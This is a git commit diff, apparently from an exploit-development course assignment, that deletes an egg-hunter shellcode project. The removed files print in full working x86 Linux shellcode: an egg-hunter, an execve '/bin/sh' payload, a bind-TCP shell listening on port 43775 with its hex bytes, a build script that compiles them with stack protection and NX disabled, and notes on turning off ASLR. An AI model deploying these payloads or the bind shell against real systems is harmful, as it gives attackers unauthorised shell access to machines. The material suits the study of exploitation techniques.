Assignment 3 - major updates over Egg Hunter
parent
abf6ca0fe7
commit
eaeab3e5f7
11
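--- a/exam3/NOTES
+++ b/exam3/NOTES
@@ -1,11 +0,0 @@
-NOTES
-
-no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
-
-execstack: disables Executable space protection (NX).
-Or Data Execution Prevention (DEP) on Windows,
-or Write XOR Execute (W^X) on BSD.
-CPU’s NX bit ("Never eXecute").
-
-To disalbe Address Space Layout Randomization (ASLR) when running binary
-setarch `arch` -R ./program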
32
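--- a/exam3/USAGE
+++ b/exam3/USAGE
@@ -1,32 +0,0 @@
-USAGE
-
-1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
-
-I'm using a symlink as follows
-
-exam3$ ln -svf payload-execve-stack.nasm payload.nasm
-`payload.nasm' -> `payload-execve-stack.nasm'
-
-
-2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
-
-exam3$ ./make.sh "egg.MaRk"
-[I] Using custom EGG mark: egg.MaRk
-[+] Compiling payload.nasm ...
-[+] Compiling hunter.nasm ...
-[+] Extracting PAYLOAD code from payload ...
-[+] Adding EGG mark to PAYLOAD ...
-[+] Checking PAYLOAD code for NULLs ...
-[+] Extracting HUNTER code from hunter ...
-[+] Checking HUNTER code for NULLs ...
-[+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode
-[+] All done!
-
-
-3. Run the shellcode
-
-exam3$ ./shellcode
-Hunter Length: 21
-Payload Length: 36
-sh-4.1$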
@ -1,79 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: egghunter.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
section .data
|
|
||||||
egg1 equ "Egg-" ; DWORD Egg marker part1
|
|
||||||
egg2 equ "Mark" ; DWORD Egg marker part2
|
|
||||||
|
|
||||||
|
|
||||||
section .text
|
|
||||||
global _start
|
|
||||||
|
|
||||||
|
|
||||||
_start:
|
|
||||||
jmp short EggPoint
|
|
||||||
|
|
||||||
continue:
|
|
||||||
pop eax
|
|
||||||
|
|
||||||
; Searching for the Egg marker
|
|
||||||
next:
|
|
||||||
inc eax ; Searching backwards
|
|
||||||
isEgg:
|
|
||||||
cmp dword [eax-8], egg1
|
|
||||||
jne next
|
|
||||||
cmp dword [eax-4], egg2
|
|
||||||
jne next
|
|
||||||
call eax
|
|
||||||
|
|
||||||
; EXIT
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 1
|
|
||||||
xor ebx, ebx
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
EggPoint:
|
|
||||||
call continue
|
|
||||||
|
|
||||||
Egg:
|
|
||||||
db "Egg-Mark" ; QWORD egg marker
|
|
||||||
|
|
||||||
; loop counter = 8
|
|
||||||
xor ecx, ecx
|
|
||||||
mov cl, 8
|
|
||||||
decloop:
|
|
||||||
dec eax
|
|
||||||
loop decloop
|
|
||||||
|
|
||||||
mov ecx, eax
|
|
||||||
xor edx, edx
|
|
||||||
mov dl, 8
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 4
|
|
||||||
xor ebx, ebx
|
|
||||||
mov bl, 1
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 1
|
|
||||||
xor ebx, ebx
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
@ -1,40 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: hunter.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
section .data
|
|
||||||
egg1 equ "Egg-" ; DWORD Egg marker part1
|
|
||||||
egg2 equ "Mark" ; DWORD Egg marker part2
|
|
||||||
|
|
||||||
|
|
||||||
section .text
|
|
||||||
global _start
|
|
||||||
|
|
||||||
|
|
||||||
_start:
|
|
||||||
; Searching for the Egg marker
|
|
||||||
next:
|
|
||||||
inc eax ; Searching forward (can also try dec eax)
|
|
||||||
isEgg:
|
|
||||||
cmp dword [eax-8], egg1 ; Checking if we can see egg1
|
|
||||||
jne next ; If not, continuing to search
|
|
||||||
cmp dword [eax-4], egg2
|
|
||||||
jne next
|
|
||||||
|
|
||||||
call eax ; Once found, we call our payload
|
|
130
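--- a/exam3/make.sh
+++ b/exam3/make.sh
@@ -1,130 +0,0 @@
-#!/usr/bin/env sh
-#
-# USAGE
-# ./make.sh [Egg-Mark]
-#
-# NOTE
-# Egg-Mark must be a plaintext with 8 bytes in length
-# If Egg-Mark was not specified, the default one will be used.
-#
-# To specify a custom payload, simply modify the code of payload.nasm file.
-# Alternativly, you can modify PAYLOADCODE= variable down below the code.
-#
-
-ARG1=$1
-
-if [ -z "$ARG1" ]; then
-echo " [I] Argument not specified. Using default EGG mark."
-ARG1="Egg-Mark";
-elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
-echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
-exit 1;
-else
-echo " [I] Using custom EGG mark: "$ARG1
-fi
-
-
-DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
-EGGMARK=$ARG1
-NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
-
-# Uncomment to save EGGMARK in HEX
-EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
-
-# Cleanup
-rm -f shellcode payload.o payload hunter.o hunter
-
-echo " [+] Compiling payload.nasm ..."
-nasm -f elf32 -o payload.o payload.nasm
-ld -m elf_i386 -o payload payload.o
-
-echo " [+] Compiling hunter.nasm ..."
-nasm -f elf32 -o hunter.o hunter.nasm
-ld -m elf_i386 -o hunter hunter.o
-
-echo " [+] Extracting PAYLOAD code from payload ..."
-PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
-
-echo " [+] Adding EGG mark to PAYLOAD ..."
-FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
-
-echo " [+] Checking PAYLOAD code for NULLs ..."
-if [[ $FULL_PAYLOADCODE == *00* ]]; then
-echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
-exit 1
-fi
-
-
-echo " [+] Extracting HUNTER code from hunter ..."
-HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
-
-# For debugging only
-#echo ${DEFAULTEGG[0]}
-#echo ${DEFAULTEGG[1]}
-#echo ${NEWEGG[0]}
-#echo ${NEWEGG[1]}
-
-# Preparing Default egg to HEX form in order to replace it with a New egg
-DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-
-# Uncomment to save new EGGMARK in HEX format
-NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-
-# Uncomment to save new EGGMARK in Plaintext format
-#NEWEGG1=$(echo -n ${NEWEGG[0]})
-#NEWEGG2=$(echo -n ${NEWEGG[1]})
-
-
-FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
-
-echo " [+] Checking HUNTER code for NULLs ..."
-if [[ $FULL_HUNTERCODE == *00* ]]; then
-echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
-exit 1
-fi
-
-
-# Uncomment to see what will is replaced (default egg with a new one)
-#echo $DEFEGG1
-#echo $DEFEGG2
-#echo $NEWEGG1
-#echo $NEWEGG2
-#echo $HUNTERCODE
-#echo $FULL_HUNTERCODE
-
-cat > shellcode.c << EOF
-#include <stdio.h>
-#include <string.h>
-
-unsigned char hunter[] = \
-$FULL_HUNTERCODE;
-
-unsigned char garbage1[] = \
-"Just some garbage here...";
-
-unsigned char payload[] = \
-$FULL_PAYLOADCODE;
-
-unsigned char garbage2[] = \
-"And some garbage there...";
-
-main()
-{
-printf("Hunter Length: %d\n", strlen(hunter));
-printf("Payload Length: %d\n", strlen(payload));
-int (*ret)() = (int(*)())hunter;
-ret();
-}
-EOF
-
-echo " [+] Compiling shellcode.c ..."
-gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
-
-# Cleanup
-rm -f payload.o payload hunter.o hunter
-
-ls -la ./shellcode
-
-echo " [+] All done!"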
@ -1,44 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
|
|
||||||
; Filename: payload-execve-stack.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
|
|
||||||
global _start
|
|
||||||
|
|
||||||
|
|
||||||
section .text
|
|
||||||
|
|
||||||
_start:
|
|
||||||
; EAX
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 11 ; execve syscall
|
|
||||||
|
|
||||||
; EBX
|
|
||||||
xor edx, edx
|
|
||||||
push edx ; NULL termination of '//bin/sh' string
|
|
||||||
push 0x68732f6e ; '//bin/sh' in reverse
|
|
||||||
push 0x69622f2f ; beginning of '//bin/sh' string is here
|
|
||||||
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
|
|
||||||
|
|
||||||
; ECX
|
|
||||||
push edx ; NULL termination of a stack
|
|
||||||
push ebx ; load our '//bin/sh' on a stack
|
|
||||||
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
|
|
||||||
|
|
||||||
; EDX
|
|
||||||
push edx ; NULL terminator
|
|
||||||
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
|
|
||||||
int 0x80
|
|
||||||
|
|
@ -1,113 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: payload-shell_bind_tcp_smaller.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
; DESC:
|
|
||||||
; - Binds to a port 43775
|
|
||||||
; - Execs Shell on incoming connection
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Shellcode size: 108 bytes
|
|
||||||
; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
|
|
||||||
;
|
|
||||||
; Port is the last two bytes of the shellcode. In hex \xaa\xff (0xaaff = 43775)
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
global _start
|
|
||||||
|
|
||||||
section .text
|
|
||||||
|
|
||||||
_start:
|
|
||||||
xor eax, eax
|
|
||||||
mov al, 102 ; socketcall
|
|
||||||
xor ebx, ebx
|
|
||||||
inc ebx ; 1 = SYS_SOCKET socket()
|
|
||||||
push BYTE 6 ; IPPROTO_TCP || int protocol);
|
|
||||||
push BYTE 1 ; SOCK_STREAM || int type,
|
|
||||||
push BYTE 2 ; AF_INET || socket(int domain,
|
|
||||||
mov ecx, esp ; ECX - PTR to arguments for socket()
|
|
||||||
int 0x80
|
|
||||||
mov esi, eax ; save socket fd in ESI for later
|
|
||||||
|
|
||||||
|
|
||||||
jmp short call_get_port
|
|
||||||
port_in_esp:
|
|
||||||
pop edi ; getting port address from ESP
|
|
||||||
|
|
||||||
push BYTE 102
|
|
||||||
pop eax ; socketcall
|
|
||||||
inc ebx ; 2 = SYS_BIND bind()
|
|
||||||
xor edx, edx
|
|
||||||
push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
|
|
||||||
push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
|
|
||||||
push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
|
|
||||||
mov ecx, esp ; Save PTR to sockaddr struct in ECX
|
|
||||||
push BYTE 16 ; socklen_t addrlen);
|
|
||||||
push ecx ; const struct sockaddr *addr,
|
|
||||||
push esi ; bind(int sockfd,
|
|
||||||
mov ecx, esp ; ECX = PTR to arguments for bind()
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
||||||
mov BYTE al, 102 ; socketcall
|
|
||||||
inc ebx
|
|
||||||
inc ebx ; 4 = SYS_LISTEN listen()
|
|
||||||
push BYTE 1 ; int backlog);
|
|
||||||
push esi ; listen(int sockfd,
|
|
||||||
mov ecx, esp ; ECX = PTR to arguments for listen()
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
||||||
mov BYTE al, 102 ; socketcall
|
|
||||||
inc ebx ; 5 = SYS_ACCEPT = accept()
|
|
||||||
push edx ; socklen_t *addrlen = 0);
|
|
||||||
push edx ; struct sockaddr *addr = NULL,
|
|
||||||
push esi ; listen(int sockfd,
|
|
||||||
mov ecx, esp ; ECX = PTR to arguments for accept()
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
|
|
||||||
; dup2 to duplicate sockfd, that will attach the client to a shell
|
|
||||||
; that we'll spawn below in execve syscall
|
|
||||||
xchg eax, ebx ; after EBX = sockfd, EAX = 5
|
|
||||||
push BYTE 2
|
|
||||||
pop ecx
|
|
||||||
dup2_loop:
|
|
||||||
mov BYTE al, 63
|
|
||||||
int 0x80
|
|
||||||
dec ecx
|
|
||||||
jns dup2_loop
|
|
||||||
|
|
||||||
|
|
||||||
; spawning as shell
|
|
||||||
xor eax, eax
|
|
||||||
push eax
|
|
||||||
push 0x68732f6e ; '//bin/sh' in reverse
|
|
||||||
push 0x69622f2f ; beginning of '//bin/sh' string is here
|
|
||||||
mov ebx, esp
|
|
||||||
push eax
|
|
||||||
mov edx, esp ; ESP is now pointing to EDX
|
|
||||||
push ebx
|
|
||||||
mov ecx, esp
|
|
||||||
mov al, 11 ; execve
|
|
||||||
int 0x80
|
|
||||||
|
|
||||||
call_get_port:
|
|
||||||
call port_in_esp
|
|
||||||
db 0xaa, 0xff ; BYTE (43775 in straight hex)
|
|
||||||
|
|
@ -1 +0,0 @@
|
|||||||
payload-execve-stack.nasm
|
|
@ -1,18 +0,0 @@
|
|||||||
#include <stdio.h>
|
|
||||||
#include <string.h>
|
|
||||||
|
|
||||||
unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
|
|
||||||
|
|
||||||
unsigned char garbage1[] = "Just some garbage here...";
|
|
||||||
|
|
||||||
unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
|
|
||||||
|
|
||||||
unsigned char garbage2[] = "And some garbage there...";
|
|
||||||
|
|
||||||
main()
|
|
||||||
{
|
|
||||||
printf("Hunter Length: %d\n", strlen(hunter));
|
|
||||||
printf("Payload Length: %d\n", strlen(payload));
|
|
||||||
int (*ret)() = (int(*)())hunter;
|
|
||||||
ret();
|
|
||||||
}
|
|